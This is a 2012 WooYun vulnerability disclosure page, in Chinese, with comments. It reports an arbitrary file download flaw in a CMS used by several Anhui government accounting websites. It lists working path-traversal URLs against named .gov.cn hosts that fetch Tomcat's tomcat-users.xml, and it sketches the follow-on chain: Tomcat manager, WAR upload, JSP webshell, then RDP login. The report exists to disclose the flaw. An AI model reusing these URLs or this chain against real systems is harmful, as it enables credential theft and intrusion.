当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05291

漏洞标题:一批政府会计网使用cms漏洞

相关厂商:安徽国讯教育科技有限责任公司

漏洞作者: possible

提交时间:2012-03-16 19:31

修复时间:2012-03-21 19:32

公开时间:2012-03-21 19:32

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-03-16: 细节已通知厂商并且等待厂商处理中
2012-03-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

一批政府会计网使用cms漏洞

详细说明:

一批政府会计网使用cms存在任意文件下载漏洞,直接可以下载tomcat配置文件,使用tomcat的管理功能,直接上传war获得jsp webshell,系统权限,直接登录主机(虽然主机修改3389端口为3399,不影响登录)好像是新站点,没有继续测试...
(不知道说明白没有?反正没有太多技术含量)
声明:没有修改任何东西,没有做任何破坏,不要找我...

漏洞证明:

http://www.ahngacc.gov.cn/addcontent/webEditorhttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/files/
file_down.jsp?filename=../../../../../../../../conf/tomcat-
users.xml


修复方案:

过滤下载
仅仅测试学习,希望该主机及时修复漏洞

版权声明:转载请注明来源 possible@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-03-21 19:32

厂商回复:

最新状态:

2012-03-22:实在抱歉,没来得及确认。经过实例测试,获得更多的受影响站点。不过未通过互联网得到生产厂商联系方式,已经将事件转由CNCERT安徽分中心处置,并建议涉事单位自主联系生产厂商解决。


漏洞评价:

评论

  1. 2012-03-17 15:13 | cncert国家互联网应急中心(乌云厂商)

    目前还没有找到其他实例,仅对报送个案确认,但具体是哪个CMS的通用性漏洞无法确认。烦请possible同学补充CMS产品信息,以便对其他实例进行确认。

  2. 2012-03-18 09:16 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @cncert国家互联网应急中心 sorry 可能写的有问题!我所指的cms就是在这个服务器所有会计站点,都是一家公司(安徽国讯教育科技有限责任公司)做的,不知道这样算不算cms.http://www.aqyxacc.gov.cn/addcontent/webEditor/upload/files/file_down.jsp?filename=../../../../../../../../conf/tomcat-users.xmlhttp://www.ahjdacc.gov.cn/addcontent/webEditor/upload/files/file_down.jsp?filename=../../../../../../../../conf/tomcat-users.xmlhttp://www.xcacc.gov.cn/addcontent/webEditor/upload/files/file_down.jsp?filename=../../../../../../../../conf/tomcat-users.xml等等 不能截图我就不一个一个写了,(就是这个服务器上的所有政府会计站点,不知道算不算cms,如不算请原谅 才疏学浅...)

  3. 2012-03-19 12:26 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @possible 确实严重 遍历下载可以导致入侵

  4. 2012-03-19 13:03 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @大肠 可惜没有太通用的渗透方法,简单总结一下:http://bbs.pediy.com/showthread.php?t=148020还望指教

  5. 2012-03-19 13:34 | 采飞扬 ( 路人 | Rank:14 漏洞数:6 | 很显老的一个人:))

    tomcat-users.xml都可以下载,那问题还是相当滴严重啊

  6. 2012-03-19 13:41 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @possible 看下我发的帖子本文来自: 华夏黑客同盟论坛 本文详细地址:http://bbs.hmw.name/read.php?tid=315067

  7. 2012-03-19 13:59 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @possible 对你的文章进行了几点补充 还希望指教本文来自: 华夏黑客同盟论坛 本文详细地址:http://bbs.hmw.name/read.php?tid=315068

  8. 2012-03-19 14:32 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @大肠 不敢当 可是我还没注册 没看到 哈哈

  9. 2012-03-19 14:37 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @possible 华盟大不如前了。

  10. 2012-03-19 14:39 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @大肠 无论哪里,只要能学到知识 多些交流技术的人 就是好地方

  11. 2012-03-19 16:23 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @possible 我刚也挖到了一个遍历下载。。

  12. 2012-03-19 17:37 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @大肠 恭喜 恭喜 这个貌似很多 找国外的吧 哈哈

  13. 2012-03-21 16:55 | darksn0w ( 实习白帽子 | Rank:62 漏洞数:10 | 无折腾,不生活!)

    @大肠 目测华夏还在?

  14. 2012-03-22 08:18 | cncert国家互联网应急中心(乌云厂商)

    @possible 抱歉,忘了确认。

  15. 2012-03-22 10:02 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @cncert国家互联网应急中心 没事 这个影响不大 就是这一个服务器上的 几个小站 (没看里面内容,以为会计站 会比较严重 )

  16. 2012-03-22 13:19 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @darksn0w 还在啊 没事去灌水的。。

  17. 2012-03-26 23:48 | darksn0w ( 实习白帽子 | Rank:62 漏洞数:10 | 无折腾,不生活!)

    @大肠 没去过,听朋友说华夏有人进去了,还以为关了= =

  18. 2012-03-27 13:06 | 大肠 ( 路人 | Rank:0 漏洞数:1 | 入侵研究 seo技术)

    @darksn0w 那是淘宝钓鱼的一个人、、